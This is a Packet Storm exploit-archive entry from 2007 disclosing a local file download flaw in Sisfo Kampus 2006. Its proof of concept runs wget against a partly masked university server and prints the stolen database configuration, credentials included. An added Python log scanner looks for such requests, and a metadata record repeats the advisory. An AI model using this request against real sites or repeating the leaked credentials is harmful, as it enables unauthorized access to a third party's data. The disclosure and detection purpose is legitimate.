ID PACKETSTORM:59208
Type packetstorm
Reporter k-one
Modified 2007-09-10T00:00:00
Description
`original File name : PUPET-SisfoKampus2006.txt
Release date : September 10, 2007
Information :
=========================
Advisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability
Author: k-one A.K.A PUPET
Vendor website : http://sisfokampus.net/
Problem : Any local file can be downloaded
POC :
=========================
http://[h0sT]/[dir]/dwoprn.php?f=connectdb.php
[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php
--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php
=> `dwoprn.php?f=connectdb.php'
Resolving ***.*****-subang.ac.id... 203.130.***.**
Connecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 292 [application/dwoprn]
100%[====================================================================================================================================================================>] 292 --.--K/s
07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]
[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php
<?php
// file: connectdb.php
// author: E. Setio Dewo, Maret 2003
$db_username = "t26924_siak";
$db_hostname = "localhost";
$db_password = "siakang";
$db_name = "t26924_siak";
$con = _connect($db_hostname, $db_username, $db_password);
$db = _select_db($db_name, $con);
?>
Vendor Response:
==============
Not contacted yet
Patch :
=============
No Patch Available
This bug was discovered by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)
`
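Because the advisory lists no patch, operators of an affected install can review web server logs for requests like the one in the POC. The following is an added example, not part of the original advisory or the vendor's code: it assumes Apache combined-format access logs and that legitimate values of `f` are never server-side scripts or configuration files; the log lines, addresses and the file name `report01.dwoprn` are constructed.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Sep/2007:07:30:16 +0700] "GET /dwoprn.php?f=connectdb.php HTTP/1.0" 200 292 "-" "Wget/1.10"
192.0.2.11 - - [10/Sep/2007:08:01:02 +0700] "GET /dwoprn.php?f=report01.dwoprn HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.12 - - [10/Sep/2007:08:06:10 +0700] "GET /index.php?f=connectdb.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.13 - - [10/Sep/2007:08:07:30 +0700] "GET /dwoprn.php?f=connectdb.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Assumption: files with these extensions should never be served as downloads.
SENSITIVE_EXT = (".php", ".inc", ".ini", ".conf")

def suspicious_reason(value):
    """Return why a requested file name looks like source disclosure, or None."""
    if "/" in value or "\\" in value:
        return "path separator in file name"
    if value.lower().endswith(SENSITIVE_EXT):
        return "script or configuration file requested"
    return None

def find_source_disclosure(log_text, script="dwoprn.php", param="f"):
    """List successful requests to the download script that asked for a sensitive file."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["status"] != "200":
            continue  # unparsable line, or nothing was served
        url = urlsplit(m["target"])
        if posixpath.basename(url.path) != script:
            continue
        # parse_qs percent-decodes, so encoded values are checked in decoded form
        for value in parse_qs(url.query).get(param, []):
            reason = suspicious_reason(value)
            if reason:
                size = int(m["size"]) if m["size"].isdigit() else 0
                hits.append({"ip": m["ip"], "time": m["ts"], "file": value,
                             "size": size, "reason": reason})
    return hits

if __name__ == "__main__":
    for hit in find_source_disclosure(SAMPLE_LOG):
        print(hit)
```

Any hit that names a file holding credentials, such as `connectdb.php`, means the database password in that file should be treated as exposed and rotated.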
{"hash": "58f72a900e0539e985d7bff385d3b6100e38be4a35f27a438a05ddedf3d6a1b8", "sourceHref": "https://packetstormsecurity.com/files/download/59208/PUPET-SisfoKampus2006.txt", "title": "PUPET-SisfoKampus2006.txt", "id": "PACKETSTORM:59208", "published": "2007-09-10T00:00:00", "description": "", "modified": "2007-09-10T00:00:00", "sourceData": "`original File name : PUPET-SisfoKampus2006.txt \n \ndate releases : September 10, 2007 \n \n \n \nInformation : \n \n========================= \n \nAdvisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability \n \nAuthor: k-one A.K.A PUPET \n \nWebsite vendor : http://sisfokampus.net/ \n \nProblem : All Local File can downloaded \n \n \nPOC : \n \n========================= \n \n \n \nhttp://[h0sT]/[dir]/dwoprn.php?f=connectdb.php \n \n \n \n \n \n[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php \n \n--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php \n \n=> `dwoprn.php?f=connectdb.php' \n \nResolving ***.*****-subang.ac.id... 203.130.***.** \n \nConnecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected. \n \nHTTP request sent, awaiting response... 200 OK \n \nLength: 292 [application/dwoprn] \n \n \n \n100%[====================================================================================================================================================================>] 292 --.--K/s \n \n \n \n07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292] \n \n \n \n[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php \n \n<?php \n \n// file: connectdb.php \n \n// author: E. 
Setio Dewo, Maret 2003 \n \n \n \n$db_username = \"t26924_siak\"; \n \n$db_hostname = \"localhost\"; \n \n$db_password = \"siakang\"; \n \n$db_name = \"t26924_siak\"; \n \n \n \n$con = _connect($db_hostname, $db_username, $db_password); \n \n$db = _select_db($db_name, $con); \n \n \n \n?> \n \nVendor Response: \n \n============== \n \nNot contacted yet \n \n \n \nPatch : \n \n============= \n \nNo Patch Available \n \nThis bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana) \n \n \n`\n", "reporter": "k-one", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "283c864e9658e002d8b5924ba642fc55"}, {"key": "modified", "hash": "17e0dd5365bc2b22db88536fee055aca"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "17e0dd5365bc2b22db88536fee055aca"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "6741465d15c14b5d17480336ac16bc20"}, {"key": "sourceData", "hash": "af6f8bb6d6534d0d805e2a0d5b08135e"}, {"key": "sourceHref", "hash": "e7a97af1fcae91acf68a952177f8c333"}, {"key": "title", "hash": "23653f6f134c475e3d40c85a5581c5ec"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/59208/PUPET-SisfoKampus2006.txt.html", "lastseen": "2016-11-03T10:19:09", "viewCount": 0, "enchantments": {"vulnersScore": 3.3}}
{"result": {}}